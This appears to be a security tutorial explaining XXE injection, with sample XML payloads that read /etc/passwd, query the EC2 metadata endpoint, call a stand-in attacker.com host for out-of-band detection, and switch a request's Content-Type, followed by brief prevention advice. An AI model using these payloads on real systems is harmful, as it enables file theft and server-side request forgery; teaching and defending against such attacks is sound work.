XML External Entities (XXE) Injection

XXE (XML External Entity) injection is a common vulnerability in web applications that use XML parsing. In this article, we will explore how the attacker can exploit this vulnerability and how it can be prevented. Before going any further into what the XXE attack really is, it is better to understand the basics of the XML which you can find here.

What are XML External Entities (XXE) attacks?

At this point, we assume that you already have an idea of what an XML external entity really is. Some web applications may have vulnerability to let the attacker interfere with how the XML data is processed. By taking advantage of this, the attacker may be able to read any file systems that reside on the same server where it is hosted which leads to SSRF attack.

Exploiting XXE vulnerabilities

There are several ways of how the attacker can exploit the XXE vulnerabilities.

Retrieving files

The most common way the attacker does this is, use it for retrieving files. In a Unix-like operating system, the attacker may target the passwd file. This file is located in /etc/passwd and contains lots of information about the registered users in the current system.

Suppose that a web application that sells books uses XML for receiving the book’s title like this.

<?xml version="1.0" encoding="UTF-8"?>
<book><title>Example Book</title></book>

By exploiting this XML data, the attacker can change it to the following payload to get information about the passwd file.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>
<book><title>&passwd;</title></book>

Performing SSRF

As stated before, it is possible to take advantage of XXE vulnerability as a gateway to local service or back-end. The process is very similar to the previous one. Instead of trying to retrieve a certain file, you can try to access the backend service where the web app is hosted. In a cloud infrastructure, you can do this by accessing http://169.254.169.254/latest/meta-data/ which is known as EC2 metadata endpoint.

The XML file will look like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE url [ <!ENTITY local SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<url><title>&local;</title></url>

In some cases, the XXE vulnerabilities are blind. It means that the return value or the response is not visible directly by the attacker. Even though the application doesn’t return values or returns the value, but not what the attacker expected to, it doesn’t mean that XXE vulnerabilities don’t exist. In order to detect this vulnerability, you can use out-of-band techniques. Sometimes it is also possible to trigger errors in order to expose sensitive data.

If this is the case, then you may try his/her luck by utilizing his/her own website. To do that, the XML file can be directed to the attacker’s controlled website like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE url [ <!ENTITY website SYSTEM "https://attacker.com/"> ]>
<url><title>&website;</title></url>

By doing this, the back-end server is communicating to the attacker’s web app instead of the intended web app (victim’s). This is what we call OAST (Out-of- band Application Security Testing) technique.

Modifying Content Type

Perhaps, you can make your own way to exploit the POST request in a web application. In a request header, it is common to define allowed Content-Type. Most websites will have something like this.

Content-Type: application/x-www-form-urlencoded

Some of them may tolerate another filetype like XML file as well. If so, then changing this to the following header should also work.

Content-Type: text/xml

So the following request can be modified to something like this.
Original:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded

abcd

Modified:

POST /action HTTP/1.0
Content-Type: text/xml

<?xml version="1.0" ?><book><title>test</title></book>

Then the attacker can change the request body, with the previously mentioned payload, or any payload for XXE injection

Preventing XXE

The most obvious way to prevent this is simply disable any dangerous XML parsing library. Another way the developers can prevent this from happening is disabling the DTD completely depending on the parser the web application is using. In fact, any programming language depends on a different XML parser library, thus it is a good idea to follow the prevention guidance regarding XXE vulnerabilities.